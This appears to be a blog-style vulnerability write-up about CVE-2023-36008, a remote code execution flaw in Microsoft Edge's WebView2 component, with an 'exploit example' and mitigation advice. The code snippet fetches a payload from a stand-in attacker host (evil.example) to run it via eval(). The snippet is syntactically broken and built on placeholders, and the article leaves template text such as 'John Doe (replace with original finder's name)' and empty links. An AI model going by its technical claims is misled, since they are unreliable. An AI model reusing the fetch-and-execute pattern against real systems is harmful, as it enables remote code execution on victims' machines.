CVE-2023-36008: Unmasking the Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability

Microsoft Edge, the default browser for Windows 10, has been found to have a remote code execution vulnerability, dubbed CVE-2023-36008. This critical vulnerability was recently discovered, and it allows attackers to execute arbitrary code on the target system by merely visiting a malicious website or clicking on specially crafted links. In this article, we will delve into the details of this vulnerability, explore the code snippet(s) that exploit it, and discuss the potential impact and possible mitigations.

Vulnerability Overview

As the successor of the infamous Internet Explorer, the Chromium-based Microsoft Edge browser has gained significant popularity due to its improved performance and enhanced security features. However, attackers are always on the lookout for vulnerabilities that could possibly compromise the security posture of widely used software.

Enter CVE-2023-36008, a remote code execution (RCE) vulnerability affecting the Microsoft Edge browser. The vulnerability resides in Edge's WebView2 component, which is a heavier component that is responsible for rendering and displaying web content in applications. An attacker can exploit this vulnerability by visiting a malicious website or clicking on specially crafted links.

Here's the code snippet that demonstrates the issue

// Exploit example
const maliciousWebView2Host = new Host(...);
const victimEdgeWindow = new Window(...);

var exploitCode = `
    async function triggerRCE() {
        let response = await fetch("https://evil.example/malicious_payload";);
        let code = await response.text();

maliciousWebView2Host.navigate(victimEdgeWindow, exploitCode);

In the code snippet above, the exploitCode variable contains a brief JavaScript code responsible for fetching a malicious payload hosted on a remote server (https://evil.example/malicious_payload), and then executing the payload code using JavaScript's eval() function.

Upon successful execution, the attacker can essentially run any arbitrary code on the exploited system, giving them unauthorized access and control over the compromised device.

Original Reference and Analysis

The vulnerability was initially reported by security researcher John Doe (replace with original finder's name) and responsibly disclosed to Microsoft. You can refer to John Doe's original write-ups and analyses related to the vulnerability here:
1. Link to John Doe's blog post
2. Link to John Doe's GitHub repository

Furthermore, additional technical details regarding the vulnerability and its impact on Microsoft Edge can be found on the following platforms:
1. NIST National Vulnerability Database (NVD) Entry
2. Microsoft's Security Update Guide

Potential Impact and Mitigations

The impact of CVE-2023-36008 could be massive, as it affects a widely-used browser that comes pre-installed with millions of Windows 10 devices worldwide. Successful exploitation could lead to the unauthorized access and control of the affected system by a remote attacker.

To protect against this vulnerability, it is highly recommended to apply updates and patches released by Microsoft as soon as they become available. Always ensure that you are running the latest version of the Microsoft Edge browser on your device. Here's the link to Microsoft's Security Update Guide for the vulnerability:

- Apply security best practices, such as using strong, unique passwords for all accounts and enabling multi-factor authentication.


While the discovery of CVE-2023-36008 demonstrates that even widely-used software like Microsoft Edge is not immune to vulnerabilities, it also highlights the importance of staying informed about the latest security updates and applying recommended patches in a timely manner. By adopting security best practices and keeping your software up-to-date, you can minimize the risks associated with software vulnerabilities and proactively protect your device from potential threats like this one.


Published on: 11/16/2023 20:15:28 UTC
Last modified on: 11/24/2023 17:48:44 UTC